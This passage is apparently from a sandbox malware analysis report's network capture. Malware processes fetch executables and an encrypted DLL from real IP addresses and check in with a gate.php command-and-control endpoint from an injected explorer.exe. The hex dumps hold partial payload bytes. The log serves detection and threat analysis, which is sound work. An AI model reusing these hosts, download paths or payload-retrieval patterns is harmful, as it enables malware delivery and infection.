[TRUNCATED] Data Ascii: 8da4N?<o3CD[j[UWW[Y]FXmEL[FGIHBETST\HW\\QFCHQYXT[\IHBBUUTSCHLZZCPZXQ[U@GUPUF^BRQVWUS^CPF[SDY]YVR\N@WSV[^VLCPU\[QDGMJ__^ZWH[RAZUZOY]SXORZDGUA\CSKQ[YRUABJZ_NZRRZK^N^_CZUXG^CWD\ZYZKN[ZUY]_IDTXPX_EH_VVTNJX[OJDN[DDQYkl;B:?4<F[^RUEDF8=C?o?B;=A<hN9nBEFFBF]AD@V]X\HPYYL\UTWHCQWZBQ^TEDk?CDB@IQM^[@4<DBGAV9VXZE_@?<BABn43DBE9lCDBBPVj[\P[BP^AWAEQPEPj@__K[U6RY\TW@YDAn\h<FFCDBBPX]RXQWQVE9UQhZDmFBGD\HMkCRYSP^U@EVUC__U\XZDY[SMlO^DEXWW\TGl@[WSk\RXU?Z,@_K_rRArEA\G@TZZVTZX[GAECEPj@MUABkCVAM\DZi?[j9FBYBQ?8@\W\eTCh[LTjXU^UPB:WkXnSlVEQZZLElhFQCYYFVCmA^i]eTCh[LTjVXAC_kYYKVXZE^B[G[KYZjACCXUCQGQQDASXjDRGZXeP_WP
Dec 12, 2024 16:49:02.231939077 CET	1236	IN	Data Raw: 41 4c 53 6b 43 0f 5e 5b 54 5b 5c 5a 14 56 5a 46 59 6e 12 07 4f 46 3a 52 07 40 03 69 15 14 43 15 1c 10 07 4d 46 0b 3e 1b 53 56 58 51 08 56 4c 56 45 49 17 5f 50 55 5b 40 0d 54 59 01 56 42 0c 59 08 1a 08 40 5a 57 5d 0a 54 0a 16 69 10 08 51 17 10 05 Data Ascii: ALSkC^[T[\ZVZFYnOF:R@iCMF>SVXQVLVEI_PU[@TYVBY@ZW]TiQEG_BTYXJElXPUhPSP:pPTDWNPBXB^_^FIXXXPUXACMA8@AWNeFVEE[eo9l@@ZQ[ihC_Pj@\HIiSEkTWL\PZFX_kT:FF^NT^mFSnBXEMY
Dec 12, 2024 16:49:02.231945038 CET	448	IN	Data Raw: 03 06 3e 1b 10 58 43 43 0e 57 0d 54 40 4a 04 6a 16 6c 17 14 05 47 44 0d 54 59 17 44 03 57 12 08 6b 16 5e 05 57 38 40 15 5b 52 5f 65 12 5a 57 45 05 6e 0c 42 58 65 1b 16 57 5c 54 47 17 0f 6c 40 51 59 17 5b 4b 57 09 5b 43 46 5e 0f 11 0a 17 58 57 44 Data Ascii: >XCCWT@JjlGDTYDWk^W8@[R_eZWEnBXeW\TGl@QY[KW[CF^XWDZlEVYL\FUTW[FjGPF^Pe]TF_LUe]]UPUP[BhFWHhRBhDEBTnV^__POPGP]SZD\RQQ^YAV[]TE8@BCIWYARVFJj\TV^o^SR:XqV@TCUCMB_
Dec 12, 2024 16:49:02.232069016 CET	1236	IN	Data Raw: 0d 44 07 1a 47 5c 58 55 40 59 43 51 59 6e 12 04 58 44 08 18 0f 50 32 50 5b 51 5c 02 45 0d 13 40 57 6a 40 07 0c 55 57 55 04 5d 42 51 5a 4b 04 6a 16 53 43 42 38 10 10 10 41 1b 11 53 1e 40 5b 69 15 57 5e 0d 57 0d 05 1b 53 46 12 17 59 5d 53 59 15 58 Data Ascii: DG\XU@YCQYnXDP2P[Q\E@Wj@UWU]BQZKjSCB8AS@[iW^WSFY]SYX^VXM_[^Z_S^SB:XAQZJCjPRYf__Q\QhFs4aJEU]S_IEMCAiMSLDiDBQCSX[hDn>8@DWLUj=BYTT\hVBnBZWZZA_mAT>ECUjP>
Dec 12, 2024 16:49:02.232110023 CET	1236	IN	Data Raw: 55 55 08 17 5d 1e 06 5e 43 07 05 54 46 0e 09 50 0d 44 10 01 5b 57 16 45 5b 68 44 54 42 40 59 4e 52 17 4f 56 5d 58 16 5c 5e 4d 16 17 12 46 0f 68 5c 57 49 43 40 1d 56 5b 0a 46 51 0b 59 53 17 6a 44 0a 46 09 5e 5a 41 16 45 44 0b 51 0f 6a 40 4c 43 5c Data Ascii: UU]^CTFPD[WE[hDTB@YNROV]X\^MFh\WIC@V[FQYSjDF^ZAEDQj@LC\DhU>WX[QiJ@=SWS:FANDT^mFPJB>ZZVB_kJN[kY[DFESiFFD_XO\\FMlVETTIPBU\\Nl@YYS:FTB@^^PQB_eVPQ=BVGPXXQWQl@tYSFW\RZE?DYSUQ_UR
Dec 12, 2024 16:49:02.232115984 CET	1236	IN	Data Raw: 10 46 03 4d 58 1b 0c 17 43 1b 40 1b 38 33 19 16 14 10 15 14 44 12 10 42 15 41 00 54 39 57 09 5b 43 51 5f 17 13 5e 6f 3f 12 16 42 19 10 19 16 17 41 11 39 3a 3f 19 19 16 14 10 15 14 44 12 10 42 17 16 1e 3b 6c 14 46 15 17 14 11 43 11 44 42 15 12 16 Data Ascii: FMXC@83DBAT9W[CQ_^o?BA9:?DB;lFCDBBRVP=UP_VDQF[T_kWGZSQ<TZ@{JCXQR=BVGPX\YQP\>BChD<iDBBABPW\QSA^^R@X\A_AXTUjPSjWL[VUGhFSVE:YDCGPU
Dec 12, 2024 16:49:02.232275009 CET	1236	IN	Data Raw: 6d 38 00 05 4a 6d 03 14 56 78 1b 71 51 1c 5b 6a 4e 0d 09 4b 68 6c 57 1b 03 12 6d 59 17 55 0a 58 15 40 46 59 43 57 63 06 56 01 1a 50 41 16 5f 19 6b 19 19 6b 3d 53 4a 7b 49 74 45 5a 40 53 04 1d 3f 53 1d 18 76 1b 2d 7c 4b 7a 36 18 6d 04 1c 5a 6c 1f Data Ascii: m8JmVxqQ[jNKhlWmYUX@FYCWcVPA_kk=SJ{ItEZ@S?Sv-\|Kz6mZlP[DleT?ZVXGD@JbPSS[l?mJaNBKbQLvLy({ilikj;P^D[FLUKOd]TAVKwX\NLQYsWRX^DWZLZXPZS/^RF_YFuTW^SSEX^RK_
Dec 12, 2024 16:49:02.232280016 CET	1236	IN	Data Raw: 17 14 11 43 11 44 42 15 12 16 42 19 12 5d 57 43 00 6e 00 52 53 56 4b 53 16 0a 15 16 58 1d 44 0b 43 5a 00 08 44 18 6b 3f 17 14 11 43 11 44 42 15 12 16 42 19 12 50 58 5d 04 52 16 15 0f 19 1b 0a 47 53 47 5d 14 46 0e 04 42 58 06 42 0f 5b 08 15 45 51 Data Ascii: CDBB]WCnRSVKSXDCZDk?CDBBPX]RGSG]FBXB[EQAPt^Z#]TKSDT[\NwPTGQAU[FCSR6RWNJlA>kWbmnUIY]OMwH~,(enN9QMjkejVVL98=UKOvy)*2hOmBM[JeeTWi_SYE@gRST
Dec 12, 2024 16:49:02.232285976 CET	1236	IN	Data Raw: 3f 50 50 03 00 61 69 04 4b 00 36 06 5a 05 33 74 07 73 4f 45 07 02 54 10 19 19 4d 44 4c 0a 15 13 30 70 5d 01 65 4f 5d 74 51 06 11 40 62 60 7f 55 70 2f 27 64 00 7e 16 6a 5b 0d 0e 50 0f 04 10 5f 45 7b 1e 16 49 0b 15 47 01 46 79 0c 43 53 17 40 07 58 Data Ascii: ?PPaiK6Z3tsOETMDL0p]eO]tQ@b`Up/'d~j[P_E{IGFyCS@XN]E^W\qUZvURFJ\E^PC%VTRESJ_G[F4<ABH9nBkh<FIJ8=9;CJihBEKZ[@DAXRSSZYF=hEDDA_CN@?<B@S=TZWMSZDDi=hEFF
Dec 12, 2024 16:49:02.232290983 CET	776	IN	Data Raw: 5f 1e 06 5a 07 47 15 7b 56 59 54 43 0c 5a 42 4e 12 5f 04 19 18 5a 5a 56 12 42 2c 56 58 5c 17 42 5b 7c 5a 43 01 40 73 03 44 53 4d 1f 48 5d 08 56 5b 41 55 06 42 4c 45 44 40 55 0d 5d 55 1e 1f 1e 41 4a 42 52 59 17 5a 5a 55 43 46 78 0d 41 44 4c 45 53 Data Ascii: _ZG{VYTCZBN_ZZVB,VX\B[\|ZC@sDSMH]V[AUBLED@U]UAJBRYZZUCFxADLESYQNV[UBPBDDALBJKSZZFRA$RFFDQBCDPBgsqQOoVmq)vXGXyw3dW2oB\DQFU\STWSRPU_QUWSPXRSPQUBW(V^2gP5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.10	50010	185.215.113.16	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:00.805367947 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 12, 2024 16:49:02.145746946 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:01 GMT Content-Type: application/octet-stream Content-Length: 2791936 Last-Modified: Thu, 12 Dec 2024 15:23:21 GMT Connection: keep-alive ETag: "675affe9-2a9a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 72 39 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+r9+`Ui` @ @.rsrc`2@.idata 8@nwmnxdbs@::@esrtnfgg t@.taggant@+"x*@
Dec 12, 2024 16:49:02.145785093 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:49:02.145792007 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:49:02.145849943 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:49:02.145920992 CET	896	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:49:02.145926952 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:49:02.145934105 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:49:02.145945072 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: koRP{>t"J}$dZx~p[%UsXtZ.X,p+be}z\|
Dec 12, 2024 16:49:02.146176100 CET	1236	IN	Data Raw: 4b f4 bd 58 15 7e f6 89 dd de 70 a7 15 aa 04 f0 49 bc 84 a2 8a 54 2f 9d 43 ca 92 1b 3e ca 84 c1 14 15 07 98 66 33 62 7c 0e cd b0 b1 40 59 7a a1 46 a1 8f be 02 5b 60 c0 20 cc 33 a7 f9 ec 67 9c a2 58 71 c4 d3 ac 40 ac 22 c1 25 b5 67 2b db cc 60 94 Data Ascii: KX~pIT/C>f3b\|@YzF[` 3gXq@"%g+`\|afO{9z(By.`zly$<~PsV-$Pf?.Qy>8XsQj1'RR~<^Qs;N
Dec 12, 2024 16:49:02.146182060 CET	1236	IN	Data Raw: 84 6e c6 ba ff 7b 78 d2 c9 4b aa fc ef 41 b3 01 f1 51 94 18 1c 89 2e cb 5d 67 75 ff fd 62 06 f8 e2 ce 50 da e3 b4 fd 11 c6 19 97 09 e7 eb b7 88 fc 52 90 57 9a 1b 7f 42 86 c2 bc b5 cc b2 b4 5a 4d 8a 94 4a f2 21 9b fc 3c bb 9e 97 9d 14 95 fa 10 33 Data Ascii: n{xKAQ.]gubPRWBZMJ!<3kILqYR=P9+O9@sXELr2kA06Q:Zj1epH7;-rn\R^Dup`BW0PyGL
Dec 12, 2024 16:49:02.265997887 CET	1236	IN	Data Raw: 77 67 22 7f cc 99 44 eb fa f7 78 6f ca 20 f3 2c 8b b7 62 ad 22 7a 53 84 b4 bc e0 a4 5f 79 73 ef 2d 89 b8 66 4f 68 56 b0 f0 06 fb dc 47 54 64 72 22 88 6a 02 dc 57 78 ec 2e 9d 30 e5 cf 8b d0 b2 36 2e 2d 3d 1e de 6e e8 56 59 f7 b2 43 58 8b 74 1d 77 Data Ascii: wg"Dxo ,b"zS_ys-fOhVGTdr"jWx.06.-=nVYCXtwH/QNbQ}\_TkrFlvbP.Hsk$rCZ~HH}hSSs$cs_r\2K_,N

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.10	50011	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:01.272135019 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:01.392290115 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:02.927227974 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:01 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.10	50017	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:03.150294065 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:03.271064043 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:04.864295959 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:03 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.10	50020	80.82.65.70	80	5584	C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:05.026329994 CET	412	OUT	GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:06.384747982 CET	204	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:06 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 12, 2024 16:49:06.446377039 CET	386	OUT	GET /dll/key HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:06.920089006 CET	224	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:06 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 21 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73 Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
Dec 12, 2024 16:49:07.014075041 CET	391	OUT	GET /dll/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
Dec 12, 2024 16:49:07.587246895 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:07 GMT Server: Apache/2.4.58 (Ubuntu) Content-Disposition: attachment; filename="fuckingdllENCR.dll"; Content-Length: 97296 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED] Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEPOuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~\|jbK!N7R}T2bsq1L^!\|qD'sLnD@bn%0=bQ1+lQXO\|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
Dec 12, 2024 16:49:07.587268114 CET	224	IN	Data Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU\|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(ucc
Dec 12, 2024 16:49:07.587297916 CET	1236	IN	Data Raw: f9 ad 67 76 17 ac ab 0b db 40 d6 4d bb cd 29 6e a5 f1 4c c0 34 97 4f a7 0e ef fc 69 77 78 64 69 c1 97 d8 e5 76 6d 29 51 42 65 a8 c4 f5 a2 34 c7 ba 35 61 41 aa 57 a4 b7 cf 8b 03 c3 a3 26 de 8a 41 ec 05 e5 7f c7 58 21 a7 f2 0c 7b c0 5b 44 1a 6d 43 Data Ascii: gv@M)nL4Oiwxdivm)QBe45aAW&AX!{[DmC(^_iPUrl9L"?2Z,+V:R&!HJqa&uv5"+o%P4@.vgAY#i?_$J8sQ^I#sn`G}HC
Dec 12, 2024 16:49:07.587327957 CET	1236	IN	Data Raw: b8 96 c1 6b 69 27 5c ee c7 f9 89 a8 9e 4c 34 d5 75 9d fe 61 ca 18 4d 6f 0d 99 bc 16 23 4a 4b fb 31 9f 78 59 bb 31 c6 42 c1 b8 db d8 d2 09 84 0e 37 cd 9f 81 56 19 9f 47 ef 83 60 3c 07 f7 1b 6f 60 ce ba f3 16 fe 3c 27 3e b4 51 bc dc c3 26 bf 0f df Data Ascii: ki'\L4uaMo#JK1xY1B7VG`<o`<'>Q&Md42R32zD4:6vaG3~}safF4d\|a.V6.qz$C'^Y'=C]YA'6mo@{# }YniEVoD"8*k;
Dec 12, 2024 16:49:07.587347031 CET	1236	IN	Data Raw: 9b 84 b6 11 05 74 f4 6a 29 ea 95 12 3e 4e c6 5d 07 8a 8c 6e 0a 29 df c0 d0 dc 61 4a f2 87 c7 57 b7 17 8a ec 0d 94 4d 28 cc 70 af e6 39 a5 16 63 ea 3d 97 af a2 e0 b5 f0 4d db 26 a7 ce 90 e4 a4 5d c2 5d 0e 75 5a 74 b9 53 4e 57 3f b4 a7 76 c9 b2 72 Data Ascii: tj)>N]n)aJWM(p9c=M&]]uZtSNW?vr>o+X<T<RvNdl:b=l{bK)06(]LiR(:'hbJ5}V78t4L7xqmFJ-rBCk1^u^Xe@bZ@%
Dec 12, 2024 16:49:07.587353945 CET	672	IN	Data Raw: 6c 07 1d c8 11 25 f2 1f 74 2d 83 1a ee 39 18 27 11 d8 19 a1 b5 bf 10 bd df 8b f4 fe 95 f6 97 67 5c 9b d1 1d 4d d2 1e e3 96 dc 44 87 9c e7 63 6c 14 6e 5a 9a 91 48 6d 6f 1d 74 74 9b 44 bc c1 38 4d d4 a2 a2 0b 5a 13 86 e8 70 1a 44 98 8f 4a ec 16 e7 Data Ascii: l%t-9'g\MDclnZHmottD8MZpDJ$ERJW'\VQMf.5gs6YQK-<2s{BSP\|@M;l%&\~LIOk{1X4/bMMMw /c)F1{FsI`Fa7^2z
Dec 12, 2024 16:49:07.587361097 CET	1236	IN	Data Raw: e6 69 2d 49 51 f3 a4 d5 76 b0 82 cf 74 d1 85 19 f7 42 a9 78 eb 0b e9 01 32 e4 1d 91 61 e4 92 ad 68 8b f1 01 d1 83 62 ef 0e ea 87 d8 a0 66 e2 ec 6d df dc 97 39 57 94 e3 66 5a 2b 20 d1 43 cd 8a 07 04 20 9b 76 db 4c a6 9b 12 b9 0c 46 0b 2e ee 08 fc Data Ascii: i-IQvtBx2ahbfm9WfZ+ C vLF.CXb<SK(R?X.!:YjJD^J[,x)<"kp /uTW56"An*M%b"P{$T#/6UC{XQ;,>=
Dec 12, 2024 16:49:07.587368011 CET	1236	IN	Data Raw: df fc 63 59 94 94 22 2e 6e b1 dd f8 1b 24 0c 47 af 41 b3 94 25 ae 63 05 68 cb 3a 78 6c 3a e6 0d fb 89 7f 8a 63 45 33 22 3e 37 2f cf bc bf dc 07 94 6d 6c 26 9b 2d c4 5a 8b a4 95 2b 63 98 62 c1 cf a5 66 8f c2 9e 15 af 99 71 41 93 5a 45 26 fd cf ad Data Ascii: cY".n$GA%ch:xl:cE3">7/ml&-Z+cbfqAZE&j;{1:w\1`gub%gi&!3h+bn,awiHeKQZXrU)DT"->KTgx;1xY6#'BsZy
Dec 12, 2024 16:49:07.595438004 CET	1236	IN	Data Raw: ab 83 12 71 60 ef ac 34 32 d8 70 30 3b 55 9a 12 0e 9f 26 6c be 1f b1 56 29 68 86 1f 1c a5 97 2c 74 ca 37 9a 6a 55 f9 be e3 48 f7 00 72 6f 42 12 41 ec 23 16 2d cd d2 bf 20 52 76 63 2b 78 75 0d b1 13 ba b8 e6 b9 b1 8c 54 24 79 51 3b b2 29 1b ba 44 Data Ascii: q`42p0;U&lV)h,t7jUHroBA#- Rvc+xuT$yQ;)D<1:XRE^7ipg/]BYZe'0ZiU4Nk+@V,E#LQ$iT{}@zFA8F /7B@57ARN"lU^-
Dec 12, 2024 16:49:07.595602036 CET	1236	IN	Data Raw: 2b ed b6 90 93 b5 cb e9 5b 81 d3 0a ac cd 19 0a b7 db 61 4d 90 7d 85 3c 51 38 f9 08 b0 8a 2c 52 5c 3b a3 28 21 b4 b3 8b 95 1d cf 79 a5 e6 17 de 83 a8 dd 37 7c d0 40 73 1a 93 09 91 ed df 13 89 28 1d 8a d0 67 8b 19 59 81 4b 0b 18 94 db ad 26 01 9f Data Ascii: +[aM}<Q8,R\;(!y7\|@s(gYK&&nB<H3Qh-`uK^TG{cKiF{R_y\|w.y0Pc-:gZdSw^P;$)SL'3{y
Dec 12, 2024 16:49:07.604770899 CET	1236	IN	Data Raw: 54 e5 fd b2 c6 83 f0 18 cc 3c bb a5 89 7b 89 54 98 d8 15 a6 fa 49 a4 67 d0 03 82 eb c7 42 29 b9 76 f8 01 5c 2b 20 0a 5c 1d 33 83 13 83 42 79 3d 7e c9 17 b3 a3 51 aa c8 b6 32 7d 48 b8 ad f1 c2 7d 0a 69 9d c2 d2 7a 9b 73 02 47 89 ff 76 3e 73 48 a6 Data Ascii: T<{TIgB)v\+ \3By=~Q2}H}izsGv>sH4w3*gWM\|E j;zq{1"7:ZSe%%_d6YLVl]Rk&06B>lJk(:OB+8aQ$Mnwka{
Dec 12, 2024 16:49:08.578466892 CET	393	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 80.82.65.70 Connection: Keep-Alive Cache-Control: no-cache
